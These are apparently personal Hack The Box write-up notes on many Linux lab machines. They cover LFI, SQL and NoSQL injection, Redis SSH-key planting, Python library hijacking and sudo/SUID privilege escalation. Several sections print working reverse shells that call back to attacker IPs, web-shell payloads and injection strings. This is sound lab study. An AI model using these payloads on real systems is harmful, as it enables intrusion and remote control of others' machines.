Announcements

# HTB : Linux ## Sense

Enumeration , Open-source exploit

1. Directory enumeration leads to credentials , through which able to login to website 2. Open exploit leads to command-injection , giving direct access to root

## Nibbles

Initial ⇒ view-page-source , Directory Enumeration , Open-exploit
Privesc ⇒ sudo -l , ------------------------------

1. nmap gives 22,80 . On port 80 static html page , however ⇒ view-page-source leads to interesting comment which disclose directory `nibbleblog` 2. Gobuster on http\://$ip/nibbleblog gives : 1. admin.php : login page 2. README : version disclose `nibbleblog v4.0.3` 3. /content : /content/private/users.xml ⇒ leaks username `admin` 3. Open-exploit available (Code Execution) ⇒ 4. Inside shell doing `sudo -l` gives `/home/nibbler/personal/stuff/monitor.sh` 5.

## Node

------------------

1. Viewing website (3000) gives some usernames and checking `app.js` using Dev-Tools leaks the usernames & hashes. 2. Using these creds on the same website leads to get authenticate as user `admin account` from where i can download the backup file. 3. Decoding file.backup with base64 ⇒ file.zip , unzipping it gives hash ⇒ cracking the hash gives ⇒ SSH creds for user `mark` 4. `ps -auxx` gives 2 file running as user `tom`

## Solidstate

Initial ⇒ rsip , pop3
Privesc ⇒ pspy32 , script-modification

1. Exploiting `rsip` (4555) with default credentials leads to user enumeration and password change. 2. Using those username with changed password on `pop3` (110) leaks SSH creds in user `mindy` mail. 3. Getting shell as `mindy` & running `pspy32` gives a script `/opt/tmp.py` running as root 4. Modifing the script and putting reverse shell in it gives us the shell as root.

## Valentine

Initial ⇒ Director Enumeration , Hexdecimal dump (xxd) , SSH passphrase crack
Privesc way 1 ⇒ history + tmux || Privesc way 2 ⇒ dirtycow

1. Nmap gives 22,80,443 & --script vul states 443 is vulnerable to `heartbleed` vuln. 2. Interesting Dir-enum findings : `/dev/hype_key` which containds hexdecimal 3. `xxd -r -p` gives ssh\_private\_key & for passphrase we can decrypt it via `openssl` 4. For privesc we have 2 paths : 1. tmux 2. dirtycow 5. `ps -pf` gives tmux is running & history commands gives tmux socket path 1. tmux -S /.dev/dev\_sess ⇒ running this gives root 6. `uname -a` gives version 2012 , searchsploit gives dirtycow exploit for this version 1. gcc -pthread dc.c -o c -lcrypt && chmod +x c && ./c ⇒ gives a username `random` 2. `su random`⇒ gives root

## Poison

Initial ⇒ Enumeration , Log-poisoning || phpinfolfi.py || SSH
Pirvesc ⇒ Process check , internal network scan , port forwarding

1. Nmap gives 22,80 . On port 80 website is running which allows to read local php files , which is also vulnerable to LFI 1. pwdbackup.txt ⇒ gives base64 encoded pass 2. /etc/passwd ⇒ gives username `charix` 3. phpinfo ⇒ file\_upload is on (but not able to find neither functionality nor upload dir) 2. 1st way is doing ssh as charrix , password = `Charix!2#4%6&8(0` 3. 2nd way of exploitation is log poisoning 4. 3rd way is using phpinfolfi exploit {payloads all the things} 1. exploit :- 5. `ps -auxw` gives vnc is running & doing `netstat -anlp` gives port 5801 , 5901 6. After SSH tunneling ,accessing the port 5901 give me shell session with root user

## Sunday

Initial ⇒ Finger (79) brute force
Privesc ⇒ Enumeration , sudo -l , wget , overwriting file/binary

1. Nmap gives the following result : 1. 79 : finger ⇒ nmap result discloses the username `sunny & sammy` 2. 111 : rpcbind 3. 22022 : SSH 2. Brute forcing fingers users using exploit :- 3. Same as nmap , interesting usernames found : sammy & sunny guessing password `sunday` and doing SSH gives the shell 4. in root location `(/)` there is unusuall directory `/backup` which contaians `shadow.backup` file which basically backup file for /etc/shadow , reading it gives hash for both user `sammy & sunny` 5. Doing `sudo -l` for both user gives : 1. sammy : `wget` ⇒ we can read files , upload file 2. sunny : /root/troll ⇒ we can run it as sudo (nothing extra than this) 6. Combining both we can overwrite /root/troll using wget with our python reverse shell 1. sudo wget -O /root/troll

## Tartarsauce

Initial ⇒ Recon , Dirsearch , wpscan , wordpress plugins manuall check
Privesc ⇒ ----------------------

1. Only port80 is open ⇒ static website , dir-enum gives /webservices , still nothing useful 2. Dir-enum inside /webservices , gives /wp ⇒ site is using wordpress 3. wpscan enumeration found nothing vulnerable , 3 plugins found : ```bash [+] Name: akismet - v4.0.3 [+] Name: brute-force-login-protection - v1.5.3 [+] Name: gwolle-gb - v2.3.10 Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt ``` 4. Manually checking the README of the plugins gives something interesting ```bash == Changelog == = 2.3.10 = * 2018-2-12 * Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D ``` 5. So basically , the real version is 1.5.3 , some recon gives on of the plugin `gwolle-db` is vulnerable on this version 6. RFI in gwolle-gb v1.5.3 by visiting the link : 7. start python server , put a php reverse shell , rename it to wp-load.php , curl it ⇒ shell 8.

## Irked

Initial ⇒ IRC (6697) , open-exploit
Privesc level 1 ⇒ Enumeration + steg pass cracking
Privesc level 2 ⇒ script modification

1. 80 ⇒ an emoji is on the website , nothing else 2. 6697 ⇒ irc running , googling it gives an open-exploit , which gives shell as user `ircd` \ exploit 3. In `/home/djmardov/Documents` found .backup file , which has steg password 4. wget image , crack it using steg pass we get a new pass which work on both ssh & su 5. Got shell as `djmardov` , run linpeas.sh gives an unusall binary /usr/bin/viewuser , executing it gives this error : ```bash sh: 1: /tmp/listusers: not found ``` 7. create same name executable , insert rev shell , run viewuser ⇒ shell as root

## Friendzone

Initial ⇒ Recon , combining file-upload via SMB & execution LFI
Privesc level 1 ⇒ recon , mysql creds
Privesc level 2 ⇒ Python Library Hijacking , script modification

1. Nmap & recon are as follows : 1. 139/445 ⇒ SMB recon , with anonymous login gives 1. //10.10.10.123/Development ⇒ read & write access 2. //10.10.10.123/general⇒ creds.txt 2. 80 ⇒ disclose domain name `friendzone.red` 3. 53 ⇒ DNS recon gives some subdomain name , useful : administrator1.friendzone.red\\ 4. `administrator1.friendzone.red` ⇒ Login page (creds form smb works here) 2. On `administrator1.friendzone.red` gives 2 parameter image\_id & timestamp 3. timestamp is vulnerable to LFi , put php rev-shell in `../../../etc/development` ,using smb and accessing it gives shell as `www-data` 4. In `/var/www/mysql_data.conf` , db\_user & db\_pass available which work for ssh & su 5. After getting shell as user `friend` , running pspy shows python script sunning as root in `/opt/server_admin/reporter.py` , on some line there is `Import os` 6. in `/usr/lib/python2.7` there is os.py which is writable , Insert rev shell in `os.py` , start listener , got shell as root

## Swagshop ## Networked

Initial ⇒ File upload with double extension & exiftool to manipulate magic-bytes
Privesc level 1 ⇒ Recon in /home dir , cron files , Input manipulation
Privesc level 2 ⇒ sudo -l , Input manipulation in shell script

## Recon & Enumeration #### port scan ```bash 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 80/tcp open http Apache httpd 2.4.29 139/tcp open netbios-ssn Samba smbd 3.X - 4.X 443/tcp open ssl/http Apache httpd 2.4.29 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu ``` #### directory scan ```bash /wordpress /server-status ``` #### Just a basic web page , nothing here\ But there is a " Email us at: " , we can use "riendzoneportal.red" for further enumeration #### just a gif , nothing informational #### /wordpress Forbidden \ ## Samba Enumeration I tried listing files & anonymous login ....... and succeded , their is file present in "general" directory which contains "creds.txt" , i got credentials for admin user\ \ i tired them in ssh , ftp .... and failed\ Lets enumerate samba more ```bash nmap --script smb-enum-shares.nse -p 445 10.10.10.123 ``` and after the recon , i get to know the path of all directories and filles in samba , i will focus on those directires which are benificial for me ```bash \\10.10.10.123\Development: Path: C:\etc\Development \\10.10.10.123\general: Path: C:\etc\general ``` ## DNS Zone Transfer Listing all domains for both "friendzone.red" & "friendzoneportal.red"\ and then add all the domains in /etc/hosts file ```bash host -l friendzone.red 10.10.10.123 & host -l friendzoneportal.red 10.10.10.123 ``` At first i opened all domains with http ....but they return the same page which i found on port 80\ then i open all of them with https\:// , and i get alot of domains which are working \ but their are 2 domians through which i used solved the box\ \ [https://administrator1.friendzone.red/](https://administrator1.friendzone.red//) >> login page\ [https://uploads.friendzone.red/](https://administrator1.friendzone.red//) >> has upload functionality ## i first tried incorrect creds and got response "wrong"\ then i used creds , found in samba and got login and the page says "login success please visit dashboard.php" #### /dashboard.php the page says visit "image\_id=a.jpg\&pagename=timestamp" , \ and in response i get a picture and timestamp number , i think its vulnerable to LFI ### [https://uploads.friendzone.red](https://uploads.friendzone.red/)/ I upload a php shell on this , and its succesfully uploaded , time for LFI , i already have 2 parameters :- ## LFI /dashboard.php?image\_id=a.jpg\&pagename=timestamp #### LFI in image\_id i changed the value to a.jpg => shell.php but no reverse shell\ then i tried again n agian, but didn't get anything ..... thats weird #### directory scan ``` /login.php /dashboard.php /images timestamp.php ``` /images \ their only 2 images here , a.jpg and b.jpg\ it means my shell was not uploaded here , maybe their is any other directory where my shell is uploaded #### LFI in pagename then only option left is this , lets change the value with the directories and file name found in scan\ \ timestamp > response shows the timestamp number\ \ login > response shows "wrong"\ \ i guess , its reflecting the content of the page-name inserted here , i think its vulnerable to LFI\ to get sure i am going to request the "php source code file" \ payload :- ```bash pagename=php://filter/convert.base64-encode/resource=dashboard i got dashboard source-code , we can also request php source-code for login upload timestamp ``` ## shell as www-data After reading the source-code of dashboard , i get to know that the parameter "pagename" is taking the value and adding a ".php" after the value and then shows the content of that particular file\ I tried pagename=../../../../etc/passwd and fail , =/etc/passwd still fail , i think its bcoz ist adding a ".php" extension in the end of file\ But after samba enumeration , we know the "Development" & "general" directroy are present in "/etc/" directory\ \ Lets make a echo.php file and put it into one of the smb-directory and then try to read it\ Unfortunately we don't have write permission in "general" , only option left is "Development" ```bash command >> smbclient -N //10.10.10.123/Development -c 'put echo.php' In URL >> pagename=../../../../../../etc/Development/echo or pagename=/etc/Development/echo ``` NOTE :-\ i did not add echo.php in the payload , as i alerady know that the script do it itself\ \ Both payloads are working fine , time to upload a reverse shell and BOOM.......we got the shell ## privesc www-data => friends find a mysql config file in /var/www directory , inside the i got the credentials for user "friend" ```bash db_user=friend db_pass=Agpyu12!0.213$ ``` we can do both ssh as well as switch user to get a shell as "friend" ## privesc friend => root #### pspy after running the script , i found a cronjob which is running a python script :-\ /opt/server\_admin/reporter.py\ \ Their is nothing much in the script but it was importing an os library in the script\ then i start searching "os.py" , in order to perform python library hijacking\ \ i found os.py and it is also writable ....great , lets insert reverse shell in bottom of the script- "os.py"\ \ NOTE :-\ I removed the "os" keyword from reverse shell as we already injecting the payload in os.py\ \ Orignal payload :- ```bash s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((lhost, lport)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close() ``` Modified payload :- ```bash import pty import socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.16.8",7777)) dup2(s.fileno(),0) dup2(s.fileno(),1) dup2(s.fileno(),2) pty.spawn("/bin/bash") s.close() ``` after injecting i waited for few minutes to let the cronjon do it work , and after some time \ BOOM....... we got the shell as root.

## Jarvis

Initial 1 ⇒ SQL-injection , Extracting PHPmyadmin creds , php shell upload
Initial 2 ⇒ Direct web-shell upload using SQL-injection
Privesc level 1 ⇒ sudo -l , command injection in python script
Privesc level 2 ⇒ linenum.sh , SUID , /bin/systemctl , fake service exploitation

## nmap port open :- 22 , 80 , 64999 ## gobuster directories found :- server-status/ , phpmyadmin/ , room.php ## website (80) Their is a website running on , which has some functionality of check room (price , description , room name , rating....etc) ans it seems exploitable through sql injection lets try.... , but before that ## /phpmyadmin/ Their is a phpmyadmin login page is running on the website. although i already tried the default credentials but didnt get anything , wen need credentials for that ## website (64999) Nothing over here , just some text "you have been blocked for xxx seconds , don't be bad" ## shell as www-data ### way 1 - shell upload via phpmyadmin \ we are logged in. \ After looking the application i get to know the application version which is :- "phpmyadmin 4.8.0"\ \ lets look for any public exploit availble for this :- " searchsploit phpmyadmin | grep '4.8' " & we got 2 exploits for that \ According to the payload we are able to do LFI and also LFI to RCE \ for that we have to first run sql query and the we have to visit the url including the session id \ \ 1st lets copy session id => "phpmyadmin" cookie \ \ 2nd run sql query ``` SELECT '' ``` 3rd visit the link including the session id and command in "cmd" parameter ``` http://10.10.10.143/phpmyadmin/index.php?cmd=id&target=db_sql.php%3f/../../../../../var/lib/php/sessions/sess_e3qctegac4saf72rocbl1541j26u7mqm ``` 4th inject reverse shell in "cmd" parameter ### way 2 - Direct shell upload As we know we can write a file using sql injection & the webpage directory is /var/www/html , lets try uploading reverse shell. payload :- ```sql union select 1,2,3,4,"",6,7 into OUTFILE '/var/www/html/rev.php' ``` lets visit the page try the command injection , it works lets add reverse shell command ## privesc www-data => pepper #### sudo -l i got a file "/var/www/Admin-utilities/simpler.py" which i can run with sudo (pepper) privileges , first lets read the "simpler.py"\ basically the script is used to \ -h help\ -l list attackers ip address\ -s chack attack status\ -p ping an ip address \ \ here in "-p" the exec() function is been called , which executes the ping command , we can use command injection in this but their list of forbidden charecters :-\ \` , - , | , || , \~ , & , && , ;\ Note :- we can still run $(command) to do a command injection in script ```bash sudo -u pepper /var/www/Admin-utilities/simpler.py -p xxx--script--xxx xxx xxxx xxxxx xxxx xxx Enter an ip: $(/bin/bash) ``` i got the shell as pepper , but its not fully functional as the commads are running , but result is getting on screen\ To fix this , i first create a shell script (shell.sh) in /tmp directory and put a reverse shell in that and then do the command injection in "simpler.py" in order to execute my reverse shell script ``` sudo -u pepper /var/www/Admin-utilities/simpler.py -p xxx--script--xxx xxx xxxx xxxxx xxxx xxx Enter an ip: $(/tmp/shell.sh) ``` And BOOM we got the shell as pepper ## privesc pepper => root #### run linenum.sh after running the script , we get a binary which both pepper and root can run => "/bin/systemctl"\ \ systemctl is is a systemd utility which is responsible for Controlling the systemd system and service manager. That is, it creates and manages services\ \ Lets create a malicious service and run it using sysemctl and BOOM.......we got the shell as root.

## Mirai

-----------------

## Popcorn

Initial ⇒ PHPinfo , File-Upload
Privesc ⇒ Kernel Exploit , 1 ⇒ Full-Nelson.c || 2 ⇒ DIrty-Cow

1. Website and SSH is open , directory enum gives 2 interesting dirs :- /test & /torrent 1. /test ⇒ Shows phpinfo page ( file upload is enabled) 2. /torrent ⇒ Login & Sign-Up page is running 2. After creating user and sign-in i got a upload form , which accepts only torrent file nothing else. (php webshell not allowed) 3. After uploading .torrent file , we get another upload functionality for screenshot 1. uploading php-webshell gives success & response disclose upload path `/torrent/upload/` 2. Navigating to path , we see our webshell , triggring it gives reverse shell 4. `uname -a / uname -r` , gives the vulnerable linux version 2.6.37, upload and execute any exploit gives us root. 1. Full-Nelson.c ⇒ 2. DirtyCow

## Haircut

Initial ⇒ RFI (curl) ⇒ PHP shell ⇒ RCE
Privesc ⇒ Find command , Screen-4.5.0 , pwnkit

1. On website , able to perform RFI on Local/Remote Host (as curl running in background). 2. Used RFI to upload php webshell , which can be triggered from site/uploads. 3. Got shell as `www-data` , for privesc used pwnkit leads to `root` 4. Alternate privesc ⇒ screen-4.5.0

## Blocky

Initial ⇒ wordpress scan , directory enumeration
Privesc ⇒ sudo -l , sudo su -

## Recon & Enum #### port scan ```bash PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 8192/tcp closed sophos 25565/tcp open minecraft ``` #### directory scan ```bash /.php (Status: 403) [Size: 289] /.html (Status: 403) [Size: 290] /index.php (Status: 301) [Size: 0] [--> http://blocky.htb/] /wiki (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/] /wp-content (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/] /wp-login.php (Status: 200) [Size: 2397] /plugins (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/] /license.txt (Status: 200) [Size: 19935] /wp-includes (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/] /readme.html (Status: 200) [Size: 7413] /javascript (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/] /wp-trackback.php (Status: 200) [Size: 135] /wp-admin (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/] /phpmyadmin (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/] /xmlrpc.php (Status: 405) [Size: 42] /.php (Status: 403) [Size: 289] /.html (Status: 403) [Size: 290] /wp-signup.php (Status: 302) [Size: 0] [--> http://blocky.htb/wp-login.php?action=register] /server-status (Status: 403) [Size: 298] ``` #### wordpress scan nothing intresting over here ## website #### their is nothing much on the website , but if you click on the post (only post available on the web page) you found username "notch"

#### i found 2 jar files over here , then i used jd-gui to discover the content ### blockycore.jar i found root password in this file

## shell as notch now we have 2 username :- notch & root and 1 password :- 8YsqfCTnvxAUeduzjNSXe22\ \ i tried notch with password and it worked , i got the shell ## privesc notch => root ```bash sudo -l >> i can run all commands as user sudo /bin/bash >> i got shell as root ```

## Frolic

Initial ⇒ Enumeration , Encrypt/Decrypt , open-source exploit RCE in playsms
Privesc ⇒ Buffer overflow x-x-x-x SKIPPING x-x-x-x

## recon & Enum ### port scan ```bash PORT STATE SERVICE 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1880/tcp open vsat-control 9999/tcp open abyss ``` http page on port 1880 & 9999 ### smb enumeration nothing intresting over here ### directory scan #### ```bash http://forlic.htb:1880/ http://forlic.htb:1880/icons http://forlic.htb:1880/projects http://forlic.htb:1880/settings http://forlic.htb:1880/vendor http://forlic.htb:1880/red http://forlic.htb:1880/red/images http://forlic.htb:1880/red/about http://forlic.htb:1880/vendor/jquery http://forlic.htb:1880/Icons http://forlic.htb:1880/vendor/jquery/css http://forlic.htb:1880/Projects http://forlic.htb:1880/Settings http://forlic.htb:1880/vendor/ace http://forlic.htb:1880/vendor/ace/snippets http://forlic.htb:1880/ICONS http://forlic.htb:1880/vendor/ace/LICENSE http://forlic.htb:1880/nodes ``` #### ```bash http://10.10.10.111:9999/ http://10.10.10.111:9999/admin http://10.10.10.111:9999/test http://10.10.10.111:9999/backup http://10.10.10.111:9999/.html http://10.10.10.111:9999/admin/js http://10.10.10.111:9999/admin/css http://10.10.10.111:9999/dev http://10.10.10.111:9999/backup/user.txt http://10.10.10.111:9999/backup/password.txt http://10.10.10.111:9999/dev/test http://10.10.10.111:9999/dev/backup http://10.10.10.111:9999/admin/.html http://10.10.10.111:9999/admin/index.html http://10.10.10.111:9999/dev/.html http://10.10.10.111:9999/test/index.php http://10.10.10.111:9999/dev/backup/index.php http://10.10.10.111:9999/dev http://10.10.10.111:9999/backup/password.txt http://10.10.10.111:9999/backup/user.txt http://10.10.10.111:9999/dev/test http://10.10.10.111:9999/dev/backup http://10.10.10.111:9999/admin/js/login.js http://10.10.10.111:9999/backup/index.php http://10.10.10.111:9999/admin/.html http://10.10.10.111:9999/admin/index.html http://10.10.10.111:9999/loop http://10.10.10.111:9999/backup/loop http://10.10.10.111:9999/loop/loop http://10.10.10.111:9999/backup/loop/loop http://10.10.10.111:9999/backup/loop/loop/loop http://10.10.10.111:9999/loop/loop/loop http://10.10.10.111:9999/loop/loop/loop/loop ``` ## 9 ngnix server default page is running on \ and it also discloses the domain name :- ## Node-red login page is running on , i need creds for that ## we got php-info , after checking a little i got this :-\ allow\_url\_include Off , this means LFI is not possibe ## i got 2 files & 1 directory\ user.txt = admin\ pass.txt = imnothuman\ loop = nill\ \ i tried these creds on node-red login page but it failed ## ```bash /playsms ``` ## another login page , but when i try to intercept request i got nothing , in sorce code i got a file :- login.js this file was also founded by feroxbuster & it contains creds for this page :-\ \ username = admin , password = superduperlooperpassword\_lol ```javascript var attempt = 3; // Variable to count number of attempts. // Below function Executes on click of login button. function validate(){ var username = document.getElementById("username").value; var password = document.getElementById("password").value; if ( username == "admin" && password == "superduperlooperpassword_lol"){ alert ("Login successfully"); window.location = "success.html"; // Redirecting to other page. return false; } else{ attempt --;// Decrementing by one. alert("You have left "+attempt+" attempt;"); // Disabling fields after 3 attempts. if( attempt == 0){ document.getElementById("username").disabled = true; document.getElementById("password").disabled = true; document.getElementById("submit").disabled = true; return false; } } } ``` after successful login we got redirected to :- \ and this page contains :-\ \ ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?. after googling a little , i get to know its an Ook language when i decoded it i get this ``` Nothing here check /asdiSIAJJ0QWE9JAS ``` ## i got this :-\ \ UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA i decoded it with base64 and save it as new file and then run file command on this file and i get to know that its a zip file\ so i saved it as file.zip and i tried to unzip it , but it needs a password , then i run fcrackzip on it and got the password = password\ \ after unzipping it i got a file index.php which contains hex :-\ \ 4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a\ \ after doing hex to text i got this :-\ \ KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==\ \ another base64 decode required :- \ \ +++++ +++++ \[->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ \[->++ +<]>+ ++.<+ ++\[-> ---<] >---- --.-- ----- .<+++ +\[->+ +++<] >+++. <+++\[ ->--- <]>-- .<+++ \[->++ +<]>+ .---. <+++\[ ->--- <]>-- ----. <++++ \[->++ ++<]> ++..<\ \ another Ook decode required :- ``` idkwhatispass ``` ## [http://10.10.10.111:9999/playsms/](http://10.10.10.111:9999/playsms/index.php?app=main\&inc=core_auth\&route=login) Finally we got the password , but its not working for Node-Red login page , but it did work for playsms page. we got in \ \ after doing searchsploit i found a exploit which does work on playsms to get RCE ```bash PlaySMS 1.4 - 'import.php' Remote Code Execution | php/webapps/42044.txt searchsploit -m php/webapps/42044.txt ``` ## shell as www-data 1. visit 2. create a csv file and add the payload in it ```csv Name,Mobile,Email,Group code,Tags ,22 ``` 3. upload it and intercept the request in burp & change the user-agent to command which i want to execute . for e.g. whoami

4. enter the reverse shell in user-agent ```bash rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.6 4242 >/tmp/f ``` and we get the shell as www-data ## shell as root it requires buffer overflow , so i skipped it

## Postman

Initial ⇒ Redis , SSH-key upload
Privesc ⇒ ----------

## Recon & Enumeration #### port scan ```bash PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6379/tcp open redis 10000/tcp open snet-sensor-mgmt ``` #### directory scan for ; ```bash /images (Status: 301) /upload (Status: 301) /css (Status: 301) /js (Status: 301) /fonts (Status: 301) ``` #### website (80) Nothing intresting over here , just a static web page with no functionality #### Their is login page powered by "WEBMIN" , by default webmin doesn't have any default credentials \ \ i also tried sql & no sql injection ...... no benifit , we will look back here after a while #### /upload just bunch of images , almost no one is opening or have something intresting ....i moved on #### redis 6379 we can connect with redis just using net-cat , and we can execute commands ```bash nc -nvv 10.10.10.160 6379 ``` ## shell as redis i created a ssh pub-pri key pair and then i used the redis server to import and save the key i authorized keys , after that just do the ssh in system as redis user and , we got the shell\ \ Importing ssh key :- ```bash cat new_key.txt | redis-cli -h 10.85.0.52 -x set new_key.txt ``` Saving ssh key in authorized keys :- ```bash redis-cli -h 10.10.10.160 10.10.10.160:6379> config set dir /var/lib/redis/.ssh OK 10.10.10.160:6379> config set dbfilename "authorized_keys" OK 10.10.10.160:6379> save OK ``` ## privesc redis => Matt #### linpeas.sh I found a SSH RSA private key for Matt user , so i first used it for direct ssh login......didn't work\ \ next thing , i extracted the key contents (hash) by using ssh2john , we can also extract that online\ after extracting the hash from key , we need to crack it , for this i used john ```bash python ssh2john.py matt_ssh.key > hash.txt john --wordlist=~/chaos/rockyou.txt hash.txt >> computer2008 ``` i used the key and password and ........i still got fail , \ so i tried "su - Matt" in the shell i already have and i succeeded ......got the shell as Matt ## privesc Matt => root These credentials also work for webpage we found earlier , \ we kind of need metasploit payload to do that , so i just skip it

## Mango

Initial ⇒ No-SQL-injection , Enumeratin database & finding credentials
Privesc ⇒ linpeas.sh , Binary exploitation (jjs)

## port scan port 22 , 80 , 443 are open \ script scan :- give us a name of the domain running on port 80\ domain name :- staging-order.mango.htb ## website (80) the page returns 403 \ on ip address , i think we have to add the host in etc/host before we access this page.\ yes ..... now its working with admin pannel on it ## directory scan i done 2 directory scan one for <[http://staging-order.mango.htb>](https://mokshs-private-organization.gitbook.io/htb-short-writeup/http:/staging-order.mango.htb>) & other for <[https://10.10.10.162>](https://mokshs-private-organization.gitbook.io/htb-short-writeup/https:/10.10.10.162>) ### ```bash /home.php /index.php /vendor >> brute force again /vendor/collection/installed.json ``` i found some php and json files in this directory and i find this particular json file useful ```bash http://staging-order.mango.htb/vendor/composer/installed.json ``` After reading the file i get to know that , the application is using MongoDB on server side ......this gives a shot to test Nosql injection ### ``` /index.php > home page /analytics.php > i found nothing useful here ``` ## No-sql injection ## shell as mango i used payload to bypass the authentication , but their is nothing inside .......i need credentials, so as we dealing with nosql we can use some payload or script in orderto retrieve data\ \ i used script but here are also some manual payloads :- ```uri username[$ne]=abc&password[$ne]=xyz&login=login > to bypass authentication username[$regex]=abc&password[$ne]=xyz&login=login > brute-forcing username username[$regex]=a > checking that particular alphabets "a" come in name or not =a > checking alphabet existence =^a > checking the first alphabet of username =^a.* > full-payload ``` i got credentials , now lets try ssh\ i tried admin creds first but i fail , so i tried mango creds and BOOM......we are in ## privesc mango => admin and enter password we found using nosql injection ```bash su - admin ``` ## privesc admin => root #### linenum.sh i found a binary name "jjs" in path "/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs" with both SUID\ lets do some search and i found something on GTFObins\ \ its a java binary which can be use for :-\ file read\ file write\ reverse shell\ and some more functionalities ......\ \ i first tried reverse shell , but i get the shell with again admin user , but i need it as root user\ \ Next i tried file read , but it wouldn't work for me , now only option left for me is to a write a file\ \ so , i decided to write ssh key using jjs so i came back to my machine :- ```aql ssh-keygen ``` i named the file "mango" and i got 1 private key "mango" & 1 public key "mango.pub"\ \ we use public key to write it in target machine and use private key to login, \ so i copied the "mango.pub" content and paste it inside jjs file-write payload & \ directory = /root/.ssh/authorized\_keys\ \ login using private rsa key ```bash ssh -i mango root@10.10.10.162 and BOOM...... we got the shell as roo ```

## Traverexec

---

## Openadmin

Initial ⇒ ----

## Magic

